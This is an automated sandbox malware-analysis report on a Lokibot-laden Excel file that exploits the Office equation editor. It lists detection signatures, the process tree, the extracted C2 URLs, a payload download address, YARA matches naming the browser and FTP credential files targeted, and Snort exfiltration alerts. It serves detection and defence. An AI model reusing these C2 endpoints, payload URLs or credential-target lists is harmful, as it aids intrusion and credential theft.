Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
_2201S_BUSAN_HOCHIMINH_.xlsx

Overview

General Information

Sample Name:_2201S_BUSAN_HOCHIMINH_.xlsx
Analysis ID:569962
MD5:cf8b307caa943326ee808bb3cb02deee
SHA1:705c25adbdb7b805e47566540b3804eba178e7da
SHA256:cbe84e2c523fd51dabb1365df50415ffc51f8159c36798061742f08ba5d31b9b
Tags:LokiVelvetSweatshopxlsx
Infos:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sigma detected: Droppers Exploiting CVE-2017-11882
Yara detected Lokibot
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Yara detected aPLib compressed binary
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file registry)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Injects a PE file into a foreign processes
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Tries to harvest and steal browser information (history, passwords, etc)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Found evasive API chain (may stop execution after checking a module file name)
Yara detected Credential Stealer
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Downloads executable code via HTTP
Searches the installation path of Mozilla Firefox
Enables debug privileges
Potential document exploit detected (unknown TCP traffic)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Drops PE files to the user directory
Dropped file seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2580 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 2984 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 1712 cmdline: "C:\Users\Public\vbc.exe" MD5: 7DF1896047D9647D818080DD17563D92)
      • xmtxpy.exe (PID: 2260 cmdline: C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd MD5: 1EACD504E4461F9EE286715997D8A9EE)
        • xmtxpy.exe (PID: 2556 cmdline: C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd MD5: 1EACD504E4461F9EE286715997D8A9EE)
  • cleanup

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
      00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
        00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_GENInfoStealerDetects executables containing common artifcats observed in infostealersditekSHen
        • 0x17936:$f1: FileZilla\recentservers.xml
        • 0x17976:$f2: FileZilla\sitemanager.xml
        • 0x15be6:$b2: Mozilla\Firefox\Profiles
        • 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
        • 0x15afa:$s4: logins.json
        • 0x169a4:$s6: wand.dat
        • 0x15424:$a1: username_value
        • 0x15414:$a2: password_value
        • 0x15a5f:$a3: encryptedUsername
        • 0x15acc:$a3: encryptedUsername
        • 0x15a72:$a4: encryptedPassword
        • 0x15ae0:$a4: encryptedPassword
        00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmpLoki_1Loki Payloadkevoreilly
        • 0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
        • 0x153fc:$a2: last_compatible_version
        Click to see the 35 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        6.2.xmtxpy.exe.400000.0.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          6.2.xmtxpy.exe.400000.0.raw.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
            6.2.xmtxpy.exe.400000.0.raw.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
              6.2.xmtxpy.exe.400000.0.raw.unpackINDICATOR_SUSPICIOUS_GENInfoStealerDetects executables containing common artifcats observed in infostealersditekSHen
              • 0x17936:$f1: FileZilla\recentservers.xml
              • 0x17976:$f2: FileZilla\sitemanager.xml
              • 0x15be6:$b2: Mozilla\Firefox\Profiles
              • 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
              • 0x15afa:$s4: logins.json
              • 0x169a4:$s6: wand.dat
              • 0x15424:$a1: username_value
              • 0x15414:$a2: password_value
              • 0x15a5f:$a3: encryptedUsername
              • 0x15acc:$a3: encryptedUsername
              • 0x15a72:$a4: encryptedPassword
              • 0x15ae0:$a4: encryptedPassword
              6.2.xmtxpy.exe.400000.0.raw.unpackLoki_1Loki Payloadkevoreilly
              • 0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
              • 0x153fc:$a2: last_compatible_version
              Click to see the 76 entries

              Sigma Signatures

              Exploits

              barindex
              Sigma detected: EQNEDT32.EXE connecting to internet
              Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 198.46.132.195, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2984, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
              Sigma detected: File Dropped By EQNEDT32EXE
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2984, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exe

              System Summary

              barindex
              Sigma detected: Droppers Exploiting CVE-2017-11882
              Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2984, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 1712
              Sigma detected: Execution from Suspicious Folder
              Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2984, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 1712
              Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 1B 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2984, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Found malware configuration
              Source: 00000006.00000000.460143750.0000000000400000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}
              Multi AV Scanner detection for submitted file
              Source: _2201S_BUSAN_HOCHIMINH_.xlsxVirustotal: Detection: 35%Perma Link
              Source: _2201S_BUSAN_HOCHIMINH_.xlsxReversingLabs: Detection: 32%
              Antivirus detection for URL or domain
              Source: http://198.46.132.195/windowSSH/.win32.exeAvira URL Cloud: Label: malware
              Source: http://asiaoil.bar//bobby/five/fre.phpAvira URL Cloud: Label: malware
              Multi AV Scanner detection for domain / URL
              Source: http://198.46.132.195/windowSSH/.win32.exeVirustotal: Detection: 7%Perma Link
              Multi AV Scanner detection for dropped file
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exeVirustotal: Detection: 21%Perma Link
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exeReversingLabs: Detection: 23%
              Machine Learning detection for dropped file
              Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exeJoe Sandbox ML: detected

              Exploits

              barindex
              Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
              Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
              Source: Binary string: wntdll.pdb source: xmtxpy.exe, 00000005.00000003.463241268.00000000005F0000.00000004.00000800.00020000.00000000.sdmp, xmtxpy.exe, 00000005.00000003.461526742.00000000023E0000.00000004.00000800.00020000.00000000.sdmp
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00405D7C FindFirstFileA,FindClose,
              Source: C:\Users\Public\vbc.exeCode function: 4_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00402630 FindFirstFileA,
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 6_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,
              Source: global trafficDNS query: name: asiaoil.bar
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.46.132.195:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.46.132.195:80
              Source: excel.exeMemory has grown: Private usage: 5MB later: 61MB

              Networking

              barindex
              Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
              Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.22:49166 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49166 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49166 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.22:49166 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.22:49167 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49167 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49167 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.22:49167 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49168 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49168 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49168 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49168 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49169 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49169 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49169 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49169 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49170 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49170 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49170 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49170 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49171 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49171 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49171 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49171 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49172 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49172 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49172 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49172 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49173 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49173 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49173 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49173 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49174 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49174 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49174 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49174 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49175 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49175 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49175 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49175 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49176 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49176 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49176 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49176 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49177 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49177 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49177 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49177 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49178 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49178 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49178 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49178 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49179 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49179 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49179 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49179 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49180 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49180 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49180 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49180 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49181 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49181 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49181 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49181 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49182 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49182 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49182 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49182 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49183 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49183 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49183 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49183 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49184 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49184 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49184 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49184 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49185 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49185 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49185 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49185 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49186 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49186 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49186 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49186 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49187 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49187 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49187 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49187 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49188 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49188 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49188 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49188 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49189 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49189 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49189 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49189 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49190 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49190 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49190 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49190 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49191 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49191 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49191 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49191 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49192 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49192 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49192 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49192 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49193 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49193 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49193 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49193 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49194 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49194 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49194 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49194 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49195 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49195 -> 172.67.197.66:80
